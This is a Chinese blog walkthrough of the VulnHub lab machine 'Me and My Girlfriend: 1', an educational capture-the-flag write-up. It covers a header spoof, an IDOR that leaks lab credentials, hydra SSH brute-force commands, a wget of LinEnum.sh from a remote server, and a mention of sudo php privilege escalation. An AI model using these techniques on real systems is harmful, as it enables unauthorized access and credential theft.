vulnhub靶机ME AND MY GIRLFRIEND: 1
靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机ip:192.168.70.158
kali ip:192.168.70.129
一、信息搜集
因为kali扫不到ip,将靶机的网络连接方式改为NAT模式
进行端口和服务扫描
发现开启80端口和22duank,进行80端口的访问
查看页面源码,发现有提示信息
这个请求必须来自本地访问,这里我的火狐没有安装插件,所以使用burpsuit来添加头部信息,
x-forwarded-for:127.0.0.1
发现登录和注册页面
二、越权漏洞
进行注册,然后登陆
发现url存在id值,再注册一个用户,查看新的url是否变化
发现id变为13
可能会存在越权漏洞,进行id变化,并进入profile页面,发现个人账号泄露 ,burpsuit的配置如下
通过长度得知那个id是可以利用的。
将这几个人的账号和密码收集一下
可以查看intruder模块下的response模块
1.eweuhtandingan skuyatuh
2.aingmaung qwerty!!!
3.sedihaingmah cedihhihihi
4.sundatea indONEsia
5.alice 4lic3
6.abdikasepak dorrrrr
三、ssh连接
现在密码收集完成了,进行ssh连接吧
附上几个hydra官方给的例子
因为开放了22端口,所以我们进行的是hh连接,将账号和密码分开放在两个文本当中,在进行hydra进行爆破,使用的命令是:
hydra -L /home/ycx/Desktop/zhanghao -P /home/ycx/Desktop/mima.txt
ssh://192.168.70.158
hydra -l root -w 10 -P pwd.txt -t 10 -v -f 192.168.1.20 ssh
-l root 指定爆破账号为root
-w 10 指定每个线程的回应时间为10S
-P pwd.txt 指定密码字典为pwd.txt
-t 10 指定爆破线程为10个
-v 指定显示爆破过程
-f 查找到第一个可以使用的ID和密码的时候停止破解
结果如下
进行ssh连接
至此看到flag1
四、提权
可以使用wget下载扫描脚本,接着赋予权限,也可以使用进行扫描(比较靠谱)
Wget http://59.110.237.157/ycx/LinEnum.sh (我自己的云服务器,有效期还有20天……)
也可以使用python,进行传输文件,开启命令:pythom -m http.server 8000
[sudo -l]列出目前的权限。
分享一篇php提权知识:(10条消息) PHP提权姿势_她叫常玉莹的博客-CSDN博客_php提权
输入以上命令进行提权,提权结果如下
获取最终flag
五、知识点总结:
- 靶机ip发现
- 靶机端口扫描
- 越权漏洞发现
- burpsuit自动匹配添加x-forwarded-for信息,进行id爆破
- hydra进行爆破ssh
- 利用脚本扫描Linux,进行php sudo提权
vulnhub靶机ME AND MY GIRLFRIEND: 1相关推荐
- Vulnhub靶机渗透之Me and My Girlfriend
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- Vulnhub靶机:EVILBOX_ ONE(很详细)
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
最新文章
- 转载非原创:修改BB 的内容,回车后修改CC 的值
- 物联网安全的后备计划是什么?
- 成都铁路警方联合多部门开展反恐防暴演练
- [导入]VB实现SQL Server数据库备份/恢复
- C++ 静态线性表的顺序存储结构(数组实现)
- mysql count里面能加条件吗_select count(1) 和 count(*),哪个性能更好?
- access vba 用recordset读取表中数据的简单方法
- linux变量存储命令,如何将命令存储在shell脚本中的变量中?
- selenium中Chrome和Firefox浏览器驱动的使用和版本对应
- c语言的详细编译过程
- 【重点】剑指offer——面试题53:正则表达式匹配
- 小程序 Vant Weapp 使用插槽自定义 Cell 的左侧图标
- Proxmark3初学:用PM3克隆M1普通门禁卡方法
- 12306抢票工具的使用
- 科研狗citavi/mendeley+word使用技巧外加读论文瞎琢磨
- SQL Server中字段、记录、表、列、行、属性、元组、主键、外键的含义
- 风速 电池测试软件,QDF-6型智能热球风速计操作规程
- 如何搭建“网络课堂”
- 亲民地理-第45期-西雅图城市大学
- As rich as Crassus(扩展中国剩余定理)